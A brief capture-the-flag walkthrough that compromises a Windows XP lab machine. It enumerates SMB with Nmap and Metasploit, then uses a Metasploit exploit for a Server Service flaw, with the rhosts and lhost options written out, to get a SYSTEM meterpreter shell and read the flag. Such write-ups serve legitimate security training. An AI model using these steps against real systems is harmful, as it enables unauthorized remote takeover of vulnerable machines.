First, we start with an Nmap Scan:
The output from the Nmap scan shows us that the system is using SMB, and is running the OS Windows XP (Windows 2000 LAN Manager)
In every Assignment/Capture the Flag I do, SMB is normally the first thing to enumerate.
In order to maybe exploit an SMB vulnerability, we must attempt to find out which version of SMB is being used by the victim.
There is a really useful auxiliary module within Metasploit that scans for the version that a victim is using.
Loaded up Metasploit:
set rhosts 10.10.10.4
Enter run or exploit to start the scanner.
This tells us that the 'Host is running Windows XP SP3'
Putting this in a Google search tells us that this version of Microsoft Server Service is vulnerable to Relative Path Stack Corruption.
The link above shows us the Metasploit module to use to exploit this.
First we must use:
Then set the following options:
set rhosts 10.10.10.4
set lhost tun0
We can then enter run or exploit to start the exploit
This got us a meterpreter shell, and we can enter getuid to see which user we are logged in as.
This told us that we are NT Authority, and so no privilege escalation is required.
We can now cd into the Administrator Desktop directory, and use the type command to output the flag.
Congratulations, you pwned this box!!
Comentarios